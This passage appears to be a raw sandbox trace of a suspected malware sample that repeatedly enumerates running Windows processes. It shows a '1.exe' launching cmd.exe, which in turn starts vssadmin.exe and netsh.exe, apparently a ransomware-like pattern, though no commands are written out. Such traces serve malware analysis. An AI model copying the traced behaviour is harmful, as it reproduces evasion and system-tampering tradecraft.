lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.242] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.242] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0057.243] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0057.244] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.244] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0057.245] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0057.246] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0057.246] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0057.247] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0057.247] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0057.248] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0057.249] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0057.250] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0057.250] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0057.251] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0057.251] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0057.252] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0057.253] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0057.253] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0057.397] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0057.398] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0057.399] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0057.399] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0057.400] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0057.401] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0057.401] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0057.402] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0057.403] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0057.403] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0057.404] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0057.405] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0057.405] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0057.406] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0057.407] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0057.408] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0057.408] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0057.409] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0057.410] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0057.411] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0057.412] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0057.413] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0057.414] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0057.415] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0057.416] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0057.417] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.417] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.418] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0057.419] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0057.420] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.421] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0057.421] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0057.422] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.423] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.424] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0057.424] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.425] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0057.426] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0057.427] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.428] Process32NextW (in: hSnapshot=0x334, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0057.428] CloseHandle (hObject=0x334) returned 1 [0057.428] Sleep (dwMilliseconds=0x1f4) [0058.319] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0058.326] Process32FirstW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.327] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0058.328] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0058.332] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0058.333] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0058.334] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0058.335] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0058.335] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0058.336] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0058.337] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.337] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0058.338] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0058.339] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.339] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0058.340] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.341] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.341] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.342] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.343] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.343] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.344] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.345] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.345] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, 